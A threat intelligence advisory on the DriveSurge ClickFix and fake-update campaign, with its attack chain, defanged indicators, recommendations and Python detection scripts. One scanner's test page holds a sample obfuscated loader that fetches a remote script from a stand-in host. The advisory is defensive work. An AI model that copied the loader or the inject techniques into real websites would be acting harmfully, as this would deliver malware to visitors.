DriveSurge: Large-Scale ClickFix and FakeUpdates Campaign Targeting Windows and macOS via Compromised Websites
June 9th, 2026
High

Our Cyber Threat Intelligence Unit is monitoring a newly identified threat actor known as DriveSurge, which leverages ClickFix-style social engineering techniques and fake software update prompts to infect website visitors with malicious payloads. The campaign abuses compromised websites to display deceptive browser update notifications and CAPTCHA-style verification prompts, tricking users into manually executing malicious commands or downloading malware under the guise of legitimate updates. Once executed, the infection chain provides downstream threat actors with an opportunity to establish access to victim systems; the specific payloads and post-compromise activities vary depending on the malware delivered and the purchasing operator. The activity demonstrates an increasing trend of threat actors combining fake update lures, ClickFix-style delivery mechanisms, and living-off-the-land techniques to evade traditional defenses.
Technical Details
Threat Type: Drive-By Compromise / Malware Delivery via Traffic Distribution System
Severity: High
Affected Systems: Microsoft Windows endpoints (FakeUpdates and ClickFix delivery); macOS desktop systems (ClickFix delivery via clipboard hijacking and Terminal execution); any environment where users can browse to compromised websites using a standard web browser
Threat Actor: DriveSurge (named by Silent Push); also tracked as an unattributed Initial Access Broker (IAB) operating on a Pay-Per-Install (PPI) model. Attribution remains ongoing; no formal aliases confirmed from other vendors at present.
Tools and Components Observed:
zTDS (open-source Traffic Distribution System, v1.0.3 confirmed; publicly available at ztds[.]info; in use since at least 2015, in use by DriveSurge since at least September 2025).
Obfuscated JavaScript inject files (patterns: t.js, t.[12-char SHA-256].js, ext-b.[12-char SHA-256].js, jsrepo?rnd=)
FakeUpdates pages impersonating Google Chrome, Mozilla Firefox, Microsoft Edge, Safari, Opera, Brave, Yandex, Vivaldi, Samsung Internet, UC Browser, and other browsers
FakeUpdates ZIP payload (Windows): ZIP containing multiple DLLs and Browser Update.exe
ClickFix overlay (Windows and macOS): fake error or CAPTCHA-style prompts instructing clipboard paste into PowerShell or Terminal
Multi-stage macOS shell payload: curl-based downloader executing in /tmp, with immediate self-deletion post-execution
banerpanel[.]live: Advertisement Distribution System (ADS) with Russian-language admin interface, served alongside malicious injects on some compromised sites
Attack Chain:
Initial Access:
DriveSurge compromises legitimate, high-reputation websites and injects obfuscated JavaScript that silently loads a zTDS instance.
The injected code checks that the visitor does not have an active WordPress administrator session and has not already been served a payload, then routes the visitor to attacker-controlled infrastructure.
The inject uses Base64 encoding (atob()) and string concatenation to assemble zTDS URLs, with a failover mechanism cycling through multiple backup TDS servers if the primary fails.
Obfuscation is designed to prevent detection during routine website inspection.
Victim Profiling:
The zTDS instance profiles the visitor using IP, ASN, user agent, and referrer data to filter out bots, security researchers, and unwanted traffic.
Based on the profile, it serves one of two delivery methods to qualifying human visitors.
Defense Evasion:
The malicious inject actively checks for active WordPress administrator sessions and aborts execution if detected, limiting exposure to security teams who manage the compromised sites.
Multiple TDS failover servers ensure payload delivery even if one domain is blocked.
JavaScript obfuscation using atob() decoding and string concatenation reduces static detection. macOS payloads self-delete after execution.
Post-Exploitation:
DriveSurge operates on a Pay-Per-Install model; successfully infected endpoints are sold as access leads to downstream threat actors.
The specific post-exploitation activity on victim systems is determined by the purchasing threat operator and is not directly attributable to DriveSurge.

Impact
Initial Access Brokerage and Downstream Threat Amplification:
DriveSurge operates as a Pay-Per-Install Initial Access Broker, meaning successful infections are sold to downstream threat operators.
The full impact on a compromised organization is therefore determined by the purchasing actor, not DriveSurge itself, making containment scope difficult to assess from initial indicators alone.
Potential Credential and Sensitive Data Exposure:
FakeUpdates and ClickFix payloads are consistent with infostealer and loader delivery.
Confirmed macOS payloads establish outbound C2 communication to attacker-controlled infrastructure; the specific data accessed or exfiltrated is determined by the downstream operator.
Broad Victim Targeting via Trusted Websites:
Because DriveSurge compromises legitimate, high-reputation websites, victims may have limited indicators that a site has been compromised prior to being presented with a fake update or ClickFix prompt.
Any user visiting a compromised site using a standard browser is a potential target, regardless of browsing habits or security awareness posture.
Cross-Platform Exposure:
DriveSurge delivers tailored payloads to both Windows and macOS environments.
Organizations with mixed endpoint environments face simultaneous exposure across both operating systems from a single compromised site visit.
Data Exposure Risk:
Confirmed macOS payloads establish outbound C2 communications, creating the potential for data collection or exfiltration depending on downstream malware functionality.
Security Visibility Loss:
Malicious JavaScript injects are actively concealed from website administrators via WordPress administrator session checks, reducing the likelihood of detection by site owners.
Payload delivery pages are visually indistinguishable from legitimate browser update prompts.
Self-deleting macOS payloads reduce forensic artifact availability post-execution, increasing attacker dwell time.
Scalability of Impact:
Silent Push identified thousands of compromised websites actively serving DriveSurge injects, with additional pre-weaponized infrastructure identified at the time of reporting.
Detection Method
Security teams should monitor endpoint, network, and user activity telemetry for the following behavioral indicators:
Endpoint and Process Monitoring:
Monitor for browser processes spawning unexpected child processes following interaction with fake update prompts, or user downloads of ZIP archives containing DLL files alongside browser-themed executables such as Browser Update.exe from unfamiliar domains.
Monitor process execution events (e.g., Sysmon Event ID 1) for powershell.exe or cmd.exe processes spawned following webpage interaction, particularly where the command originated from a clipboard paste into a terminal or Windows Run dialog, the hallmark of ClickFix delivery.
Alert on obfuscated JavaScript loaded externally into visited websites following patterns such as t.js?site=[32-hex-char-string], t.[12-hex-chars].js, or ext-b.[12-hex-chars].js.
Monitor for the infrastructure fingerprints identified by Silent Push as associated with DriveSurge.
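The following is an added illustration of the process-monitoring correlation described above; it is not code from this advisory or from Silent Push. It flags a shell launch whose parent is explorer.exe (the Run dialog) or a browser when browser network activity on the same host occurred shortly before. The 120-second window, the browser and shell lists, and the flattened Sysmon-style records are assumptions.

```python
from datetime import datetime, timedelta
import ntpath

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
WINDOW = timedelta(seconds=120)  # assumption: browser activity within 2 minutes before the shell

def _exe(path):
    return ntpath.basename(path).lower()

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

def detect_clickfix(events):
    """Flag Sysmon EID 1 shell launches whose parent is explorer.exe (Run dialog) or a
    browser, when browser network activity (EID 3) on the same host precedes them."""
    events = sorted(events, key=lambda e: _ts(e["UtcTime"]))
    hits = []
    for i, e in enumerate(events):
        if e["EventID"] != 1 or _exe(e["Image"]) not in SHELLS:
            continue
        parent = _exe(e["ParentImage"])
        if parent != "explorer.exe" and parent not in BROWSERS:
            continue
        t = _ts(e["UtcTime"])
        browsed = [p for p in events[:i]
                   if p["EventID"] == 3 and _exe(p["Image"]) in BROWSERS
                   and p["Computer"] == e["Computer"] and t - _ts(p["UtcTime"]) <= WINDOW]
        if browsed:  # expect benign hits (admins using Win+R); triage the command line
            hits.append({"host": e["Computer"], "time": e["UtcTime"], "parent": parent,
                         "cmd": e["CommandLine"], "last_site": browsed[-1]["DestinationHostname"]})
    return hits

# Constructed Sysmon-style records (flattened, no real telemetry): a browser connection,
# a Run-dialog PowerShell launch 40 s later, and an unrelated cmd.exe 20 min later.
SAMPLE_EVENTS = [
    {"EventID": 3, "Computer": "WS01", "UtcTime": "2026-06-09 10:00:00",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationHostname": "compromised-site.invalid"},
    {"EventID": 1, "Computer": "WS01", "UtcTime": "2026-06-09 10:00:40",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell -c <pasted command placeholder>"},
    {"EventID": 1, "Computer": "WS01", "UtcTime": "2026-06-09 10:20:00",
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd"},
]

def demo():
    return detect_clickfix(SAMPLE_EVENTS)
```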
Network and Web Traffic Monitoring:
Detect outbound connections silently redirecting through a Traffic Distribution System, particularly zTDS infrastructure, identifiable by visitor profiling behavior where content served varies by client fingerprint.
Flag outbound HTTP/S requests loading external JavaScript with site= parameters containing 32-character hexadecimal strings, as these represent per-victim tracking beacons embedded in compromised websites.
Alert on outbound connections to IP addresses flagged in active bulletproof hosting threat intelligence feeds, particularly 91[.]92[.]240[.]127, observed as a ClickFix payload source in this campaign and listed in Silent Push's Bulletproof Hosting IOFA feeds.
User and Web Activity Monitoring:
Monitor for users interacting with ClickFix-style prompts (fake error overlays or "verification required" pages instructing clipboard paste into PowerShell or Terminal) and alert on clipboard copy-and-execute behavior involving command-line instructions originating from browser sessions.
Monitor for user-initiated downloads of archives from domains inconsistent with the currently visited site, which may indicate a FakeUpdates redirect.
Website Integrity Monitoring:
Scan web properties for externally loaded JavaScript matching DriveSurge injection patterns (t.js, t.[hex12].js, ext-b.[hex12].js) from domains outside your organization, and audit server-side files for injected script tags referencing unfamiliar external domains.
Review web server configurations for unauthorized lightweight beacon scripts that silently pass visitor telemetry to remote TDS infrastructure without site owner knowledge.
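As an added example for the JavaScript inject patterns listed under endpoint monitoring and the website integrity checks in this section (not code from the advisory or from Silent Push): a scanner that pulls script tags from a saved page, flags the t.js, t.[hex12].js and ext-b.[hex12].js names, the 32-hex site= beacon and the jsrepo?rnd= fetch, and reports any script host outside an owner-supplied allowlist. The atob()-plus-createElement heuristic for inline loaders and the constructed sample page are assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Inject filename patterns from the advisory: t.js, t.<12 hex>.js, ext-b.<12 hex>.js
INJECT_PATH_RE = re.compile(r"(?:^|/)(?:t\.js|(?:t|ext-b)\.[0-9a-f]{12}\.js)$", re.I)
SITE_BEACON_RE = re.compile(r"^[0-9a-f]{32}$", re.I)  # t.js?site=<32 hex> per-victim beacon
class _Scripts(HTMLParser):
    """Collect <script src> URLs and the full body of each inline <script>."""
    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src: self.srcs.append(src)
            else: self.inline.append(""); self._in_script = True
    def handle_endtag(self, tag):
        if tag == "script": self._in_script = False
    def handle_data(self, data):
        if self._in_script: self.inline[-1] += data

def scan_page(html, allowed_hosts):
    """Flag scripts matching DriveSurge inject patterns or loaded from hosts outside the allowlist."""
    p = _Scripts(); p.feed(html)
    findings = []
    for src in p.srcs:
        u = urlsplit(src); q = parse_qs(u.query, keep_blank_values=True)
        reasons = []
        if u.netloc and u.netloc.lower() not in allowed_hosts: reasons.append("external host")
        if INJECT_PATH_RE.search(u.path): reasons.append("inject filename pattern")
        if SITE_BEACON_RE.match(q.get("site", [""])[0]): reasons.append("32-hex site= beacon")
        if u.path.endswith("/jsrepo") and "rnd" in q: reasons.append("zTDS jsrepo?rnd= fetch")
        if reasons: findings.append({"kind": "src", "where": src, "reasons": reasons})
    for code in p.inline:
        # Heuristic (assumption): atob() plus a dynamically created script tag, as in the advisory's loader
        if "atob(" in code and ("createElement" in code or "jsrepo" in code):
            findings.append({"kind": "inline", "where": code.strip()[:60], "reasons": ["atob()-assembled loader"]})
    return findings

# Constructed sample page (not a real capture): one first-party script, one beacon inject, one inline loader.
SAMPLE_HTML = """<html><head>
<script src="https://cdn.example-org.test/app.js"></script>
<script src="https://tds.invalid/t.js?site=0123456789abcdef0123456789abcdef"></script>
<script>var u=atob("aHR0cHM6Ly90ZHMuaW52YWxpZA==")+"/jsrepo?rnd="+Math.random();
var s=document.createElement("script");s.src=u;document.head.appendChild(s);</script>
</head><body></body></html>"""
def demo():
    return scan_page(SAMPLE_HTML, {"cdn.example-org.test"})
```

Run it against a saved copy of each page on your web properties rather than a live fetch, so the check does not itself trigger a TDS redirect.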
Post-Compromise Hunting:
Do not treat a blocked connection as full containment; DriveSurge's pay-per-install model means access may already have been sold to downstream operators before detection.
Hunt for staged payloads or downloaded archives in %TEMP%, %AppData%, or Downloads folders around the time of the suspicious browsing session, and review browser history and proxy logs for intermediate domain redirects consistent with zTDS routing.
Organizations with access to threat intelligence platforms can use NiceNIC-registered domain pivots to proactively identify DriveSurge infrastructure, as Silent Push identified NiceNIC as a registrar frequently used by this actor to register TDS and payload-delivery domains.
Indicators of Compromise
Type | Indicator | Description |
Domain | beacontrace[.]bond | Malicious zTDS inject domain serving t.js script |
Domain | jclforwarding[.]com | Compromised site used to serve Fake Update / ClickFix content |
Domain | check[.]first-node[.]rocks | Malicious domain serving fake Mozilla Firefox update page |
Domain | cptoptious[.]com | zTDS delivery domain used in obfuscated payload |
Domain | newtdsone[.]shop | zTDS delivery domain used in obfuscated payload |
Domain | captioto[.]com | zTDS delivery domain used in obfuscated payload |
Domain | banerpanel[.]live | Advertisement Distribution System (ADS) panel domain |
Domain | testio[.]ecartdev[.]com | Payload and development server identified in analysis |
Domain | ycyfugihih[.]cfd | Domain linked to DriveSurge registration email pivot |
Domain | brightson[.]icu | Pre-weaponized DriveSurge infrastructure domain |
Domain | coverlink[.]icu | Pre-weaponized DriveSurge infrastructure domain |
Domain | datumprobe[.]icu | Pre-weaponized DriveSurge infrastructure domain |
Domain | eraggifts[.]icu | Pre-weaponized DriveSurge infrastructure domain |
Domain | keyview[.]icu | Pre-weaponized DriveSurge infrastructure domain |
Domain | traceglimpse[.]icu | Pre-weaponized DriveSurge infrastructure domain |
Domain | tracekey[.]icu | Pre-weaponized DriveSurge infrastructure domain |
Domain | webgleam[.]info | Domain identified via Fingerprint 3 infrastructure pattern |
Domain | cptoptions[.]com | Suspicious domain loaded into jclforwarding[.]com |
Email | thiagorivera197151[@]ycyfugihih[.]cfd | DriveSurge domain registration email (Fingerprint 6 pivot) |
Email | samuel_jordan16[@]flixtrend[.]net | Second DriveSurge domain registration email (Fingerprint 7 pivot) |
IP Address | 46[.]226[.]166[.]57 | macOS payload delivery server and C2 |
IP Address | 147[.]45[.]42[.]200 | Second macOS payload delivery server; offline at time of reporting |
IP Address | 147[.]45[.]42[.]205 | Confirmed C2 endpoint for macOS malware payloads (port 8133) |
SHA-256 | 90aecb370dfb1a99a1f7de0a9c6842ab1b664521fddea16b0ec9a91f322646fc | ZIP file downloaded via fake Mozilla Firefox update page |
SHA-256 | 7aa15de93cf85729ddf970e8d7897f69ece3ca29608f73e784a9ba40c9cea18d | macOS payload binary retrieved from C2 server |
SHA-256 | 8ecc7108cd679316bf5900e84f19b256dc399902cdede646493f502ac872cc1a | macOS malware payload (alternate); distributed by both payload servers |
SHA-256 | e1ce4e6222396a58d13dddfe64c1dd21f1632bcbe11d1867d44bab4fc646883a | macOS malware payload (alternate); distributed by both payload servers |
SHA-256 | 29ac78c51bcdfe68c64830bdeb6e41437dd55e2691149741c9b78be03b6c82ea | Malicious server body SHA-256 (Fingerprint 4) |
SHA-256 | a84b032b49773c2318b11b1164d1aada69e940229aedbf8185c33fc7dd1d2cdf | Malicious server body SHA-256 (Fingerprint 4 alternate) |
SHA-256 | 428bd0b0ac36dfdd223b3953dbe61c0baf227f893310b03e7afe3111462019c6 | Data hash linked to jclforwarding[.]com web resources |
File Name | t.js | Malicious injected JavaScript file (Fingerprint 1 pattern) |
File Name | Browser Update.exe | Fake browser update executable dropped via ZIP file |
File Name | script.js | Injected JavaScript file served by check[.]first-node[.]rocks |
File Name | banner-js[.]php | Script loaded into compromised sites via banerpanel[.]live |
File Name | changelog.txt | Publicly accessible file on zTDS server confirming TDS version history |
URL | hxxps[://]newtdsone[.]shop/jsrepo?rnd= | zTDS payload fetch URL embedded in obfuscated JavaScript |
URL | hxxps[://]cptoptious[.]com/jsrepo?rnd= | zTDS payload fetch URL embedded in obfuscated JavaScript |
URL | hxxps[://]captioto[.]com/jsrepo?rnd= | zTDS payload fetch URL embedded in obfuscated JavaScript |
URL | hxxp://46[.]226[.]166[.]57/ce3cbfc887?force=1 | C2 URL delivering macOS malware payload |

Recommendations
Educate users to never copy and paste commands from browser pop-ups, fake error messages, or "fix required" prompts into their terminal or PowerShell window, as ClickFix campaigns rely entirely on social engineering and voluntary command execution rather than software exploitation.
Download browser updates only through the browser's built-in update mechanism (About > Check for Updates) rather than from prompts appearing on external websites.
Perform a full forensic review of affected systems, focusing on browser process activity, unexpected child process execution chains, and files downloaded or written to disk during or after the suspected infection window.
Review all scheduled tasks, registry persistence keys, and startup entries created around the time of the initial suspicious execution, and validate their triggers, actions, and referenced binary paths before declaring containment.
Implement web proxy inspection policies that flag or block redirects through unknown intermediate domains between an intended website destination and a file download.
Implement a Content Security Policy (CSP) header that restricts which external domains are permitted to load JavaScript on your web properties, which would prevent or alert on DriveSurge-style script injections.
Enforce multi-factor authentication across all critical systems and remote access services to reduce the impact of credential theft resulting from a successful infection.
Initiate host isolation, memory capture, and full artifact collection before declaring containment on any endpoint where ClickFix execution or a FakeUpdates download is confirmed.
Conclusion
DriveSurge is a sophisticated threat operation that exploits users' trust in familiar websites and routine-looking browser prompts to silently deliver malware across thousands of compromised websites. Organizations should treat any ClickFix or FakeUpdates incident not as an isolated user error but as a potential entry point for a broader compromise. Timely isolation, thorough forensic review, credential rotation, and awareness of downstream threat actors are essential to limiting the blast radius of a successful DriveSurge infection. Ongoing monitoring of DriveSurge's evolving infrastructure fingerprints, as documented by Silent Push, should be incorporated into threat intelligence programs to enable preemptive blocking before users are exposed.